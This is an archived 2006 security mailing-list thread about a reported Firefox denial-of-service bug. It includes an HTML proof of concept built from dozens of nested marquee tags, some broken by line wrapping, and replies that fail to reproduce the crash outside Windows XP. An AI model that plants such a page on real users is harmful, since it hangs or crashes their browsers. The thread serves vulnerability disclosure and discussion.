Re: Fire fox dos exploit



I told this guy all ready that it looks like WinXP is the problem. Mac OS X and Debian (Linux) does not hang!


With regards,


Ronald van den Blink
Securityview.org
On 31 May, 2006, at 16:50, Josh Zlatin-Amishav wrote:

On Tue, 30 May 2006, co296@xxxxxxx wrote:

I have found a problem which causes denial of service on fire fox browser

Can you give us some more details, like versions and platforms affected? I was unable to recreate this flaw using firefox 1.5.dfsg +1.5.0 on Debian unstable.

--
- Josh


Creadit:to n00b for finding this bug..

the problem lie's in the

<marquee> html tag uses 100% cpu and crash's the browser..

Following proof of concept available

<html>
<head>
<title>Credit to n00b..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma rquee><marquee><marquee><marquee><marquee><marquee><marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marq
ue
e></marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>





Relevant Pages

  • Re: using download.35mb.com under debian
    ... | Using Debian unstable - kept uptodate on a daily basis. ... Then I tried with konqueror by setting the browser identification ... | that it is possible to use it in windows. ... As I stated above this is not a problem with your browser i.e. ...
    (Debian-User)
  • Apache2 versucht PHP File herunter zu laden
    ... Dokuwiki bestückt und bin nach der Apache und PHP Extension ... Wenn ich dann mehrmals einen apache2 reload mache, den Browser ... (Aktuelle Debian Version) ...
    (de.comp.os.unix.linux.misc)
  • Re: Instability in Iceweasel
    ... I really wish they would break one browser at a time. ... And now they've broken iceweasel too. ... I previously posted a message about iceweasel destroying my Debian ... different Debian installation, to which I now have to telnet, using ...
    (Debian-User)
  • Re: Security of the browsers
    ... I have been using Ubuntu for a while for my desktop and I am planning ... My worried is related with the security of the browser. ... The Debian approach is to freeze the version and apply themselves the ... shorter-lived operating systems. ...
    (Debian-User)
  • Re: why is "how to play a sound with Javascript" such a rare topic?
    ... I'm not on Debian ... but it works in Firefox 2.0.0.11 on Windows and I remember ... media type or b) an obsolete or misconfigured player plugin prevents the ... Anyone who slaps a 'this page is best viewed with Browser X' label on ...
    (comp.lang.javascript)